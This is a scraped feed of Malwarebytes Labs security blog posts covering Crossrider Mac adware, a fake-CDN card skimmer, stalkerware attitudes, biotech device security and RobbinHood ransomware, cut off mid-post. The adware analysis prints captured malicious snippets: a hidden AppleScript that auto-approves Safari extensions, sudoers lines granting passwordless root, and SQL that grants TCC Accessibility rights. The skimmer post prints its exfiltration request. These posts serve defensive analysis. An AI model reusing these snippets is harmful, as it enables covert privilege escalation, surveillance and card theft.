This is extracted, and an install.sh script it contains is executed. This script alone has over 900 lines of code, and it runs a number of other scripts and processes to make changes to Safari and Chrome settings and install browser extensions.

In the case of Safari, part of the process involves an AppleScript that enables an accessibility setting that provides keyboard access to all controls—and then uses that access to click the “Allow” button in the window Safari displays when the user tries to install a Safari extension.

tell application "Safari" to set bounds of windows to {0, 0, -1000, -1000} tell application "System Events" set visible of process "Safari" to false tell application process "Safari" set frontmost to true log "Clicking button 1 of sheet 1" tell window 1 to tell sheet 1 to click button 1 delay 1 end tell end tell

The script sneakily moves the window offscreen, so the user doesn’t see any of this happen during the installation process. All the user might see is that Safari briefly opens and then closes.

Next, a native Mac binary (like an app, but meant to be executed from the command line rather than through the Finder) is downloaded:

http://service.macinstallerinfo.com/Mac/getInstallScript/scripts/bin/iwt.bin

Among other files, this process, when executed, will install a component into the Applications folder, and then run a nearly 750 line shell script to make further browser changes.

Tracking data

Throughout the installation process, the various scripts and processes will repeatedly report data back to a variety of tracking servers. These transactions send potentially sensitive data, such as:

  • a unique identifier for the computer
  • IP address
  • the user name
  • macOS version
  • Safari version
  • Chrome version
  • a list of everything found in the Applications folder
  • a list of all installed agents and daemons
  • a list of all installed system configuration profiles
  • the version of the Malware Removal Tool, a security component of macOS designed to remove certain known pieces of malware

Since much of this data is obtained through scripts and processes that are downloaded from more than one server, the exact data being collected and where it’s being sent can be changed dynamically.

Changes to the system

There are a number of changes made throughout the system, some of them dangerous and difficult to remove for the average person. This makes Crossrider one of the most invasive threats I’ve ever seen on macOS.

System configuration profiles

These profiles are typically used by an IT admin to manage computers, often remotely. However, profiles can also be installed manually, via a .mobileconfig file, and the adware does exactly that.

The profile that is installed locks the home page and search engine settings in both Safari and Chrome, preventing them from being changed by the user until the profiles are removed.

Managed preferences

A managed preference is another method for changing settings that is managed by an IT admin. On older systems, the adware installs managed preference files that set Chrome’s preferences to pages associated with the adware.

Changes to the sudoers file

On Unix-based systems, like macOS, the user with the higest level of permissions is the root user. On such systems, the sudoers file is a file that identifies which users are allowed to have root-level access, and how they’re allowed to get it.

Crossrider adware makes changes to the sudoers file in multiple places. In one, lines are added to allow a couple of the installed processes to have root permissions when running on the current user’s account:

someuser ALL=NOPASSWD:SETENV: /Users/someuser/Applications/MyMacUpToDate/MyMacUpToDate someuser ALL=NOPASSWD:SETENV: /Users/someuser/Applications/UpToDateMac/UpToDateMac

In some cases, the installation process hits a snag and fails to write these changes properly, which invalidates the sudoers file, interfering with the ability to get root permissions. This can affect software installation abd the ability to troubleshoot, and is difficult to fix. (In order to fix the sudoers file, you must have root access, which you can’t get because the sudoers file is broken—it’s a catch-22.)

In other parts of the installation process, the adware gives all processes running for the user unlimited access to root without a password. The scripts try to revert these changes, but may not always be successful (such as if the script or process crashes).

someuser ALL=(ALL) NOPASSWD:ALL

These changes could be hijacked by other malicious software. For example, if a piece of malware were to overwrite the MyMacUpToDate or UpToDateMac processes in the first example (which would not require special access), it could escalate to root to do more damage. In the latter example, any process would be able to elevate to root access unconditionally.

TCC.db

In several places, the installation process will attempt to modify the TCC.db database. This database identifies which permissions the user has given to different processes, such as whether an app can access your calendar, your contacts, your computer’s microphone, your webcam, or certain folders on your system.

This adware attempts to give itself and a wide swath of other processes one of the most powerful capabilities: Accessibility access. This permission allows these processes to control other processes, which can be used to capture sensitive data, among other things.

if [[ "${osxVer}" == *"10.11"* ]] || [[ "${osxVer}" == *"10.12"* ]]; then /usr/bin/sqlite3 <<EOF .open '${TCCDB}' insert or replace into access values('kTCCServiceAccessibility','com.apple.Terminal',0,1,1,NULL,NULL); ... insert or replace into access values('kTCCServiceAccessibility','/bin/bash',1,1,1,NULL,NULL); insert or replace into access values('kTCCServiceAccessibility','/bin/sh',1,1,1,NULL,NULL); insert or replace into access values('kTCCServiceAccessibility','/usr/bin/sudo',1,1,1,NULL,NULL); insert or replace into access values('kTCCServiceAccessibility','${TMPDIR}/.tmpma/installOffers.sh',1,1,1,NULL,NULL); insert or replace into access values('kTCCServiceAccessibility','com.stubberify.mym',0,1,1,NULL,NULL); insert or replace into access values('kTCCServiceAccessibility','com.tostubornot.mym',0,1,1,NULL,NULL); insert or replace into access values('kTCCServiceAccessibility','com.trustedmac.service',0,1,1,NULL,NULL); insert or replace into access values('kTCCServiceAccessibility','com.autobots.transform',0,1,1,NULL,NULL); insert or replace into access values('kTCCServiceAccessibility','com.mm-install-macos.www',0,1,1,NULL,NULL); insert or replace into access values('kTCCServiceAccessibility','com.mm-installer-macos.www',0,1,1,NULL,NULL); .quit EOF fi

This only works on older systems, as the TCC.db file is read-only by anything other than the system on recent versions of macOS. However, on an older system, this can give powerful permissions that could be abused by future updates of the adware, or by malware attempting to escalate its access to user data.

Browser extensions

Several browser extensions are installed for either Safari or Chrome or both, depending on the version of the system and versions of Safari and Chrome. These extensions give the adware greater capability to control the behavior of the browser.

Ordinarily, addition of a browser extension requires the user to confirm, for the express purpose of preventing adware or malware from surreptitiously installing a browser extension. However, this adware uses a number of shady tricks—such as the modified copy of Safari mentioned previously—to get these extensions installed without the user needing to approve them or even being aware they’ve been installed.

Browser extensions can gather an intrusive level of information from the browser: essentially, any data that may be displayed on a website or entered into a form on a website. The latter can include sensitive data, such as usernames, passwords, and credit card numbers.

Launch agents and daemons

Launch agents and daemons provide one of the most common ways for processes to stay persistently running on macOS. Crossrider adware installs multiple agents or daemons, depending on which files are being installed. Fortunately, these are extremely easy to spot for someone knowledgeable—in fact, they’re one of the first things a tech might look for—and are relatively easy to remove.

Malware must be worse, right?

Fortunately (or unfortunately, depending on how you look at it), no. Contrast Crossrider adware with some nation-state malware, such as malware made by North Korea’s Lazarus group or the OceanLotus malware thought to be created by Vietnam. Such malware typically installs a single launch agent or daemon, easily spotted by any expert who looks at the machine. Crossrider’s installation process alone far exceeds these forms of malware in sophistication.

Mac malware tends not to be particularly sophisticated. Of course, this doesn’t mean it can’t be dangerous, but right now, it’s sitting at the malware kiddy table. Simply put: It’s not sophisticated because it doesn’t have to be. If you’re a Mac user infected with malware, there are probably not going to be any outward symptoms you’d notice.

In contrast, adware is highly noticeable, since it changes the behavior of your computer, most typically your web browser. For this reason, Mac adware has had to evolve well beyond Mac malware, and has become far sneakier and harder to get rid of.

What’s the takeaway?

Although many Mac experts like to dismiss adware as a non-issue, saying people only get infected when they do “stupid things,” most of the most massive data breaches and damaging ransomware attacks on Windows machines happen because of user negligence: leaving data exposed on the Internet, opening malicious links via phishing email, or failing to patch software in a timely manner.

Adware is a growing problem on the Mac—and on Windows and Android operating systems as well. It was the most prevalent threat across all regions globally, for both consumers and businesses. And we saw that some Mac adware was actually more prevalent than most Windows threats in 2019.

Worse, these adware infections are usually more severe than a malware infection, opening up potential security holes that could be taken advantage of by more malicious threats and proving arduous to get rid of. In addition, adware on the Mac also commonly intercepts and decrypts all network traffic, uses randomly-generated names for installed files, uses analysis avoidance techniques to prevent researchers from analyzing them, creates hidden users on the system with known passwords, and more.

All in all, if I had to choose between one or the other, I would willingly infect my own machine with most of the Mac malware out there before I would do the same with Mac adware. Mac malware often makes me laugh. Mac adware sometimes gives me chills.

IOCs

The following indicators of compromise are associated with this adware.

Domains http://www.weknow.ac http://*.searchmine.net http://client.mm-bq.host http://service.macinstallerinfo.com http://*.macmymacupdater.com http://*.mycouponsmartmac.com http://*.myshopcouponmac.com http://*.mycouponizemac.com http://*.shopperifymac.com http://*.shoppinizermac.com http://*.couponizermac.com http://*.surfbuyermac.com http://*.surfmatemac.com http://*.myshopbotmac.com http://*.myshopmatemac.com http://*.bestsmartshoppersmac.com Files searchmine.sh441fa62645591b2aa1b853ebfa51fe5bb36e6464ad3a4ff58a0b8297bea851d9mm-install-macosee94315a1099a982a2b61878a64ee6fe9134e544cdcae565995948a8ca843e51webtools888a1f9dfadde892496a3214ceb2a5a62a3997381ba6dbcd4e741d033352fd31imsearch.tar.gze07c9e59f7621eead7300cfe264a2d24a7749d592d8a2b32c48125eadf293f08install.sh591919f7b5ced77431990e7e9f257ce049f1fb2f93e9cdcb19b5400060518031iwt.bin168d9c1a06ab3f633e6fc724834ad8a9f4dc3c71945a34342347ce0df042a361gui_scripting.shdf402cf21e5f78e55050d7ee14c050869d477faaeb58ab841f5992a0638a4a9finstallSafariExtension212a954a7b67e851063daa2acabe841e8e54a4c29ca4f1fc096a160f1764aa14installSafariHpNt18b449b7d25733557d305b8a8ae9b331e628ec892996a83a39cb74bf2a7eca9aupdate_legacy_chrome.py   b5ac18d3ea66dfad4baf02efad1a2f27f8134a2cd0f3c1d78e44d49bed613064updatePreferences.py6180666302bbf8032801d0aec6df08fbd27349c9d628f3a3dd7295256bf751b6

Thanks to Aditya Raj Das for finding the sample and assisting with the analysis!

The post Mac adware is more sophisticated and dangerous than traditional Mac malware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Stalkerware and online stalking are accepted by Americans. Why?

Malwarebytes - Thu, 02/27/2020 - 16:00

Despite warnings from domestic abuse networks, privacy rights advocates, and a committed faction of cybersecurity vendors, Americans may be accepting and minimizing online stalking behaviors, including the use of invasive apps that can pry into a user’s text messages, emails, photos, videos, and phone logs.

The limited opposition to these at-times abusive behaviors was revealed by a new study conducted by NortonLifeLock, consumer cyber safety vendor and founding member of the Coalition Against Stalkerware, which Malwarebytes helped form last year.

The distressing survey revealed that nearly half of individuals between the ages of 18 and 34 said they found online stalking to be “harmless.” Further, the study revealed that 1 in 10 Americans admitted to using digital monitoring apps—sometimes referred to as stalkerware—against their ex or current romantic partners.

How did we get here?

Unfortunately, we cannot exact whether the NortonLifeLock survey results represent a shift in attitudes or reflect a long-held acceptance of surveillance culture online. While US government agencies have recorded stalking statistics for decades, those same agencies either have not recorded admissions of online stalking behavior and perceptions of its harms, or did not respond to requests for such data.

However, domestic abuse advocates and researchers agreed that several factors play a role in the public’s acceptance of this type of behavior. Many romantic comedy films romanticize stalking, while increasingly more consumer home devices have normalized private, digital surveillance. Further, current mobile apps have turned the viewing of someone’s private life into an otherwise harmless interaction.

More likely, though, is that the public has always failed to recognize and respond to the actual harms of stalking, said Elaina Roberts, technology safety legal manager with National Network to End Domestic Violence.

“This is an age-old crime and people’s perceptions of it, in my opinion, haven’t changed all that much,” Roberts said.

The NortonLifeLock Online Creeping Survey

In conjunction with The Harris Poll, NortonLifeLock surveyed more than 2,000 adults in the United States about “online creeping”—behavior that includes consistent, stealthy tracking of someone online, which could also veer into behavior that is more akin to cyber stalking.

Overall, the survey found that 46 percent of respondents admitted to “stalking” an ex or current partner online “by checking in on them without their knowledge or consent.”

The most common forms of online stalking included checking a current or former partner’s phone—at 29 percent—and looking through a partner’s search history on one of their devices without permission—at 21 percent. Disturbingly, 9 percent of respondents admitted to creating a fake social media profile to check in on their partners, and 8 percent of respondents admitted to tracking a partner’s physical activity through their phone or through a health-related app.

Kevin Roundy, technical director for NortonLifeLock, warned about these behaviors.

“Some of the behaviors identified in the NortonLifeLock Online Creeping Survey may seem harmless, but there are serious implications when this becomes a pattern of behavior and escalates, or when stalkerware and creepware apps get in the hands of an abusive ex or partner,” Roundy said.

When asked why respondents engaged in these behaviors, the top two answers revealed a lack of trust and an itching, potentially harmful level of concern; 44 percent said “they didn’t trust [their partner] or suspected they were up to no good,” while 38 percent said they were “just curious.”

The gender disparity in the results was clear. In seemingly every category, men found it more acceptable to engage in these behaviors and to have these behaviors enacted against them.

While 35 percent of respondents said “they don’t care if they are being stalked online by a current or former partner as long as they are not being stalked in person,” it was 43 percent of men who agreed with that statement versus 27 percent of women. Further, 20 percent of men said they tracked a current or former partner’s location, versus 13 percent of women. Men also showed that they more readily accepted online stalking if one or both of the partners in a relationship had cheated or were merely suspected of cheating.

These results reflect broader statistics in America about who is more often victimized by stalking.

According to a national report of about 13,000 interviews conducted by the Centers for Disease Control and Prevention (CDC), an estimated 15.2 percent of women and an estimated 5.7 percent of men have been stalked in their lifetime. Women who said they were stalked during their lifetimes stated they were the target of a variety of behaviors, including being approached at home or work (61.7 percent); receiving unwanted messages like texts and voice mails (55.3 percent); and being watched, followed, or spied on with a “listening device, camera, or GPS device” (49.7 percent).

When asked if the CDC records the rate of admission of stalking behavior and perceptions to stalking behavior, a spokesperson said the agency does not keep such statistics.

The Bureau of Justice Statistics, which also tracks stalking in America, did not respond to a request for similar data.

Despite the two agencies’ robust datasets on the threat of stalking, the NortonLifeLock survey revealed a different perspective on similar behavior—a potentially concerning coziness with it. Young Americans in particular, the survey showed, found little threat in online stalking.

The survey said that 45 percent of those aged 18–34 found online stalking to be “harmless.” The same age group most heavily engaged in the behavior—65 percent said they have “checked in on a current or former significant other.”

Domestic abuse advocates argue that those high statistics reflect a society that fails to fully recognize the harms of stalking, cyberstalking, and invasive behavior toward romantic partners. Further, the language actually used in the survey might point to less nefarious interpretations by young people.

The normalization and minimization of stalking

Despite the NortonLifeLock study revealing troubling perceptions of online stalking behavior, Erica Olsen, director of Safety Net at National Network to End Domestic Violence, said these perceptions existed long before the advent of technology-enabled abuse. It’s been happening for decades, Olsen said.

“I unfortunately think that stalking behaviors have always, to some extent, been accepted and minimized.” Olsen said. “I think a lot of it has to do with the romanticizingof some of the behaviors—specifically following and spying.”

Olsen pointed to many romantic comedies that portray stalking as endearing.

In The Graduate, Dustin Hoffman’s character follows Katharine Ross’s character despite explicitly being told to drop contact, much like John Cusack’s character in Say Anything ignores the wishes of his ex-girlfriend played by Ione Skye. The 1954 film Seven Brides for Seven Brothers involves several men who kidnap a group of women, and no, it isn’t a horror movie.

As The New Statesmen wrote:

“A group of brothers kidnap six attractive women by causing a life-threatening avalanche that keeps them imprisoned all winter. The women play pranks on the men in revenge, and, in a shocking case of Stockholm syndrome, everyone has an all-round jolly time. They pair off and are all married by summer.”

These types of films can impact audience perceptions of intrusive and aggressive behavior, found Julia Lippman, a research fellow at the Center for Political Studies-Institute for Social Research at the University of Michigan.

According to Lippman’s paper, “I Did It Because I Never Stopped Loving You: The Effects of Media Portrayals of Persistent Pursuit on Beliefs About Stalking,” women who watched movies with positive portrayals of aggressive romantic pursual were more likely to accept those behaviors, as opposed to women who watched movies with scary or threatening depictions of those same types of behaviors.

In speaking to the online outlet Bustle, Lippman said:

“Positive media portrayals of stalking—like those where the pursuer is rewarded by ‘getting the girl’— can lead people to see stalking in a more positive light.”

Media portrayals aside, another factor could play a role in the public’s acceptance of online stalking that amounts to digital surveillance—the privatization of surveillance in our own neighborhoods. Millions of smart doorbells have crept into countless suburbs across America, capturing footage of package thieves, yes, but, more often, of neighbors, children, and animals engaged in harmless behavior.

According to a survey conducted by The Washington Post, smart doorbell owners who understood the privacy risks of their devices said the risks were not enough to deter them from ownership. As The Washington Post wrote:

“[In] the unscientific survey, most people also replied that they were fine with intimate new levels of surveillance—as long as they were the ones who got to watch.”

Finally, the acceptance of “online stalking” by younger generations could intersect with emerging ways of staying in touch with one another, and with the language that young people—particularly teenagers—use.

Diana Freed, a PhD student at the Intimate Partner Violence tech research lab led by Cornell Tech faculty, said that, in her research, she has found that teenagers often use the term “stalking” in a harmless way to check in on people online.

“It’s a very common term used with teens—‘Let’s stalk that person on Instagram,’—but they’re not saying it with the intent to harm,” Freed said.

(Full disclosure, when this Malwarebytes Labs writer attended college, he frequently heard the words “Facebook stalk” used to describe looking up a romantic crush, whether that meant viewing their photos or trying to find their “Relationship Status.”)

Freed said many apps also provide an opportunity for “wholesome” viewing of other people’s lives. With features like TikTok’s constant video feed or Snapchat Stories and Instagram Stories—which give users the ability to post phots and short videos for only 24 hours—users can view another user’s daily activities, despite being physically separated. That type of behavior does not have to be covert, Freed said, and can be done “with full knowledge” between two people who are friends offline.

“The ability to follow people closely is made available to us just by the features offered,” Freed said.

As to whether the presence of the technology itself—including stalkerware-type apps—has somehow created more stalkers, no expert interviewed for this piece saw a provable correlation.

Roberts of NNEDV said that even before the proliferation of GPS devices and stalkerware, domestic abusers would excuse their persistent, physical following of their partners by saying they were merely concerned for their partner’s safety. Today, she said, abusers use the same lies—urging survivors to use GPS location apps or stalkerware as a way to ensure safety.

“So, while we can potentially say that people are just more inclined to be accepting of this behavior today,” Roberts said, “I believe the truth is that people have always minimized these types of ‘caring’ behaviors as they appear to be done out of concern.”

Moving forward

All of this presents two concerning realities—Americans are growing warm to online stalking; Americans have always accepted stalking. Neither is the type of reality that should go unopposed.

Remember, online stalking that violates a person’s privacy is not harmless. Many of the behaviors described in the survey are the same types of behaviors that domestic abuse survivors face every day, from using stalkerware to learn private information, to tracking a person’s GPS location as a means to find them to inflict violence.

For years, Malwarebytes has worked to detect and raise awareness about invasive monitoring apps that can pry into users’ lives without their consent. This latest survey only proves that more work is needed. We’re ready for it.

The post Stalkerware and online stalking are accepted by Americans. Why? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Fraudsters cloak credit card skimmer with fake content delivery network, ngrok server

Malwarebytes - Wed, 02/26/2020 - 17:03

Threat actors love to abuse legitimate brands and infrastructure—this, we know. Last year we exposed how web skimmers had found their way onto Amazon’s Cloudfront content delivery network (CDN) via insecure S3 buckets. Now, we discovered scammers pretending to be CDNs while exfiltrating data and hiding their tracks—another reason to keep watchful eye on third-party content.

Sometimes, what looks like a CDN may turn out to be anything but. Using lookalike domains is nothing new among malware authors. One trend we see a fair bit with web skimmers in particular is domains that mimic Google Analytics: Practically all websites use this service for their ranking and statistics, so it makes for credible copycats.

In the latest case, we caught scammers using two different domains pretending to be a CDN. While typically the second piece of the infrastructure is used for data exfiltration, it only acts as an intermediary that attempts to hide the actual exfiltration server.

Oddly, the crooks decided to use a local web server exposed to the Internet via the free ngrok service—a reverse proxy software that creates secure tunnels—to collect the stolen data. This combination of tricks and technologies shows us that fraudsters can devise custom schemes in an attempt to evade detection.

Inspecting code for unauthorized third-parties

We identified suspicious code on the website for a popular Parisian boutique store. However, to the naked eye, the script in question looks just like another jQuery library loaded from a third-party CDN.

Figure 1: Compromised online store, with source code showing a CDN like domain

Although the domain name (cdn-sources[.]org) alludes to a CDN, and unveil.js is a legitimate library, a quick look at the content shows some inconsistencies. There should not be fields looking for a credit card number for this kind of plugin.

Figure 2: A malicious third-party library impersonating a legitimate one

To clear any doubts, we decided to check an archived copy of the site and compared it with a live snapshot. We can indeed see that this script did not exist just a couple of weeks prior. Either it was added by the site owner, or in this case, injected by attackers.

Figure 3: Snapshots comparing online store before and after the hack

The script checks for the current URL in the address bar and if it matches with that of a checkout page, it begins collecting form data. This typically includes the shopper’s name, address, email, phone number, and credit card information.

Figure 4: Another fake CDN domain used as part of the data exfiltration process Data exfiltration via ngrok server

Once this data is collected, the skimmer will exfiltrate it to a remote location. Here, we see yet another CDN lookalike in cdn-mediafiles[.]org. However, after checking the network traffic, we noticed this is not the actual exfiltration domain, but simply an intermediary.

GET https://cdn-mediafiles.org/cache.php HTTP/1.1 Host: cdn-mediafiles.org Connection: keep-alive Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Referer: https://www.{removed}.com/checkout/onepage/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Connection: keep-alive Content-Length: 36 Ly9kNjgzNDRmYi5uZ3Jvay5pby9hZC5waHA=

Instead, the GET request returns a Base64 encoded response. This string, which was already present in the original skimmer script, decodes to //d68344fb.ngrok[.]io/ad.php which turns out to be the actual exfiltration server.

Figure 5: Customer data being stolen and exfiltrated to ngrok server

Ngrok is software that can expose a local machine to the outside as if it was an external server. Users can create a free account and get a public URL. Crooks have abused ngrok to exfiltrate credit card data before.

To summarize, the compromised e-commerce site loads a skimmer from a domain made to look like a CDN. Data is collected when a shopper is about to make a payment and sent to a custom ngrok server after a simple redirect.

Figure 6: Traffic flow, from skimming to data exfiltration

The above view is simplified, only keeping the key elements responsible for the skimming activity. In practice, network captures will contain hundreds more sequences that will make it more difficult to isolate the actual malicious activity.

Blocking and reporting

We caught this campaign early on, and at the time only a handful of sites had been injected with the skimmer. We reported it to the affected parties while also making sure that Malwarebytes users were protected against it.

Figure 7: Malwarebytes blocking the skimmer on the checkout page

Threat actors know they typically have a small window of opportunity before their infrastructure gets detected and possibly shutdown. They can devise clever tricks to mask their activity in addition to using domains that are either fresh or belong to legitimate (but abused) owners.

While these breaches hurt the reputation of online merchants, customers also suffer the consequences of a hack. Not only do they have to go through the hassle of getting new credit cards, their identities are stolen as well, opening the door to future phishing attacks and impersonation attempts.

Indicators of Compromise

Web skimmer domain

cdn-sources[.]org

Web skimmer scripts

cdn-sources[.]org/jquery.unveil.js
cdn-sources[.]org/adrum-4.4.3.717.js
cdn-sources[.]org/jquery.social.share.2.2.min.js

Redirect

cdn-mediafiles[.]org/cache.php

Exfiltration URL

d68344fb.ngrok[.]io/ad.php

The post Fraudsters cloak credit card skimmer with fake content delivery network, ngrok server appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Biotech health care innovations meet security challenges

Malwarebytes - Tue, 02/25/2020 - 17:54

The level and speed of innovations taking place in the biotech industry are baffling. On the one hand, it makes us hopeful we can quickly reduce the number of illnesses and their consequences through technological advancement—saving thousands of lives. On the other, concerns about the application of Internet-connected technology leave us wondering: at what cost?

Where does the mix of technology and medicine lead us? Advancements in genetic therapy have reshaped cancer treatment as we know it. Yet, other applications, such as automating medicine intake by measuring biometrics, may introduce whole other problem sets the medical and security world haven’t solved for.

Knowing that every human body is unique and may react in another way to the same procedure, it seems prudent to draw the line at a certain amount of automation. But how do we determine where to draw the line? Is it smart to leave that decision to the big pharmaceuticals? Let’s have a look at the developments in biotech that require bigger picture thinking from the security and privacy perspectives.

Developments in the health care industry

Some of the most promising health care developments in late stages of refining or even already in use are techniques where sensors are attached to or inserted into the patient’s body. The sensors are designed to transmit data about certain bodily conditions back to healthcare personnel.

One such technology is inserted directly into patients’ medication via chip. These “smart pills” send biometric data from within the blood stream. When the patient ingests the pill, the chip will be detected by a patch on her stomach the moment it is digested. If the patch doesn’t receive the appropriate signal, it alerts the patient’s doctor.

A big step forward for the future of smart pills will be the automation and timely administering of medicine; something currently in development. These smart pills are being designed to make patients life’s easier by embedding a tracking system in the pill that trigger the release of the drug in a timely manner, so you can’t forget.

Smart pills could also be programmed to release the medication when certain circumstances are met. A system similar to this already exists for diabetes. Insulin pumps for type 1 diabetics are in use that release insulin when a low blood sugar is detected, basically by mimicking the way the pancreas would behave for healthy people.

Diagnostic biotech

Existing bio-sensors are internal measurement devices that broadcast body metrics like blood pressure, pulse, oxygen saturation, blood sugar, etc. These bio-sensors and sensors measuring the presence of other substances in the blood can be used to finetune the administration of drugs. But what if anybody else can receive these transmissions?

The feasibility of multiplex biosensors for bloodstream infection diagnosis has been under investigation for a few years and is another development that could lead to transmissions concerning our health from inside our body to a “smart” device.

Pharmaceutical companies have already released digital smart pills containing computer chips. The first digital cancer pill, which was released in early 2019, contains a chip and capsules filled with capecitabine, a cancer chemotherapy that patients need to take several times a day.

Other biotech innovations

The human genome has been almost fully mapped and we are rapidly finetuning the ability to read the map. But what does this prospect bode for the future of the information that can be extracted from the DNA samples we provided for various different reasons?  Will donating blood or participating in a DNA test now result in a privacy nightmare later on? Will the risk we take now grow on us as science finds out more about the information stored in our DNA.

Genetically detectable diseases

With greater understanding of our genetics comes greater capacity for their manipulation. And gene editing currently stands as one of the most exciting, and worrying, areas within the biotech industry.

Another worrying advancement is the use of artificial intelligence (AI) to make the development of new drugs faster and cheaper. AI particularly can be used to reduce the amount of trial and error needed to design a drug candidate once a promising disease target had been identified. It can also be used to investigate and find unexpected use cases for drugs that fail in clinical trials. Promising changes, for sure. But what might AI miss that the human mind would catch? And how much would morality come into play if machines are conducting all of the testing?

Remote control of artificial limbs and animals

The advancement of modern prosthetics has gone hand in hand with the upcharge in rapid developments in the biotech health care sector.

In a combination of robotics and neuro-engineering scientists are working on a new robotic hand that could be a life-changing device for amputees. The goal is to read and transmit intended finger movement read from the muscular activity on the amputee’s stump for individual finger control of the prosthetic hand.

In the military field sharks and other animals have been given brain implants that makes them remotely controllable. These sharks could for example be used to find enemy submarines.

Communication protocols in biotech

The smart pill, produced and patented by Proteus and called Abilify MyCite, sends a simple pulse from the pill to the patch as soon as the pill gets absorbed by stomach acid. No problem there, but then the patch sends data like the time the pill was taken and the dosage to a smartphone app over Bluetooth. The data is stored in the cloud where the patient’s doctor and up to four other people chosen by the patient, can access the information. The patient can revoke their access at any time.

In 2017 the FDA stated it was planning to hire more staff with “deep understanding” of software development in relation to medical devices, and engage with entrepreneurs on new guidelines, because it expected to get more approval requests for digital pills. This was after the approval of Abilify MyCite, which is a typical symptom of legislation running after technical innovations without ever truly catching up.

In 2018 hackers demonstrated they could install malware on an implanted pacemaker after they had discovered bugs Medtronic‘s software delivery network, a platform that doesn’t communicate directly with pacemakers, but rather brings updates to supporting equipment like home monitors and pacemaker programmers, which health care professionals use to tune implanted pacemakers.

Bluetooth and medical devices

Bluetooth is ideal for the short-range, continuous wireless connection, that we use for streaming audio and data. The most commonly used Bluetooth protocols in medical equipment are Bluetooth Low Energy (BLE) and Bluetooth Classic

BLE is a Bluetooth protocol that was launched in 2010, it was designed to achieve goals of low power consumption and latency while accommodating the widest possible interoperable range of devices. The downside is that it can behave differently depending on smartphone platforms. This is because the device advertises on a schedule for smartphone response. When the smartphone responds, a handshake (bonding) is made, facilitating a confirmed transfer of the data packet to the smartphone before closing the connection. This saves energy, but it’s also responsible for unpredictable data transfer speed.

BLE also does not require paring between the sender and receiver and it can send authenticated unencrypted data. We understand the benefits of saving energy:

  • Devices can stay longer in the body without having to be replaced
  • Batteries can be smaller, so easier to insert and less obtrusive

But depending on the nature and particularly the sensitivity of the transmitted data, other considerations might come into play. Unfortunately BLE devices have also been found to be impacted by SweynTooth vulnerabilities.

Recommendations

Developers of medical devices who intend to use Bluetooth as the technology to connect devices with each other and with Wi-Fi should consider carefully which Bluetooth protocol is right for their system. To do this, it is important to have a clear understanding of the needs for the system and the available options.

Medical devices should be easily updatable for those circumstances where new vulnerabilities are found and patches or other important updates need to be applied.

Maybe the healthcare industry should even consider designing a new protocol similar to Bluetooth. Combining the Low Energy properties with some extra security measures might pay off in the long run.

Cloud solutions that are used to store sensitive personal and medical data deserve to be held against a high security standard.

We recommend only giving up your DNA samples to trusted organizations and only for reasons of utmost importance like your health.

Machines are not without fault or as smart as we might think. Blind trust in machines when it comes to healthcare can end in a catastrophy. There is an area where personal attention does a lot more good than the fully automated application of medicine can ever do.

Stay safe, and stay healthy!

The post Biotech health care innovations meet security challenges appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Introducing Lock and Code: a Malwarebytes Labs podcast

Malwarebytes - Tue, 02/25/2020 - 17:27

Intrepid Labs readers might be happy to know that we’re stepping into territory long-requested and desired: we’re launching a podcast.

Malwarebytes researchers and reporters are on the front lines of cybercrime, delivering both fast-breaking news and thoughtful features on our blog to raise awareness and help users stay safe and private online. We want to take what we do here and bring it to a new medium so that even more folks can incorporate cybersecurity lessons into their daily lives.

As our real world and online world continue to blend, staying secure and aware are ever more critical in defending against attacks from criminals and encroachment on privacy from big tech. And that’s why, every two weeks, we’ll be breaking down the top headlines into easily digestible soundbytes and inviting marquee experts, both in-house and outside, to dive deep into some of the more complex issues.

Take a listen to the trailer for our podcast—Lock and Code—for a taste of things to come:

Lock and Code, a Malwarebytes podcast

Tune in next Monday, March 2, for the first episode of Lock and Code, where host David Ruiz will break down news from the RSA floor, plus talk with the annual conference’s Director of Content and Curation Britta Glade on this year’s theme: the human element.

The post Introducing Lock and Code: a Malwarebytes Labs podcast appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Threat spotlight: RobbinHood ransomware takes the driver’s seat

Malwarebytes - Thu, 02/20/2020 - 18:09

Despite their name, the RobbinHood cybercriminal gang is not stealing from the rich to give to the poor. Instead, these ransomware developers are more like big game hunters—attacking enterprise organizations and critical infrastructure and keeping all the spoils for themselves.

In 2019, the RobbinHood ransomware creators successfully attacked and received ransom payouts from the cities of Baltimore, Maryland, and Greenville, North Carolina. Not ones for humility, they now mention those successes in revised ransom notes, pointing out to victims that it’s useless to try recovering their files in any other way than paying the ransom.

And the ransom isn’t exactly cheap. RobbinHood ransom demands can range from 3 Bitcoins for a single computer up to 13 Bitcoins for a complete network, which translates to tens of thousands of dollars.

“It’s impossible to recover your files without private key and our unlocking software. You can google: Baltimore City, Greenville city and RobbinHood ransomware.” How RobbinHood ransomware works

Like many other ransomware families, RobbinHood, which Malwarebytes detects as Ransom.RobbinHood, has been observed gaining access to organizations’ networks through brute force of Remote Desktop Protocols (RDP) or by using other Trojans that provide access to the attackers.

Once the attacker has gained sufficient access to the system, researchers found that in some cases they introduce a vulnerable kernel driver from Gigabyte. This driver is signed by the motherboard manufacturer and will be accepted by Windows because of the digital signature. But the driver has a long-standing vulnerability listed as CVE-2018-19320, which allows a local attacker to take complete control of the affected system.

The attacker uses this vulnerability to stop 181 specific services, disabling many protective programs, backup software, and deleting files that would normally be locked. System services often keep critical files in use, so they can’t be deleted or modified. Being able to stop these services from the kernel driver level makes taking full control of a system much easier.

Before the actual encryption begins, RobbinHood also disconnects all network shares, deletes all shadow copies, clears event logs, and disables Windows automatic repair.

For the encryption process itself, it fetches a public key from the file pub.key in the Windows temp folder. While encrypting files, an AES key is created for each separate file. The ransomware will then encrypt the AES key and the original filename with the public RSA encryption key and append it to the encrypted file. Each encrypted file will then be renamed using the format:

Encrypted_[randomstring].enc_robbinhood

During encryption, these folders are skipped:

  • ProgramData
  • Windows
  • bootmgr
  • Boot
  • $WINDOWS.~BT
  • Windows.old
  • Temp
  • tmp
  • Program Files
  • Program Files (x86)
  • AppData
  • $Recycle.bin
  • System Volume Information

Four different ransom notes are dropped in every folder that contains encrypted files. Most of the notes contain information similar to the one below:

What happened to your files?
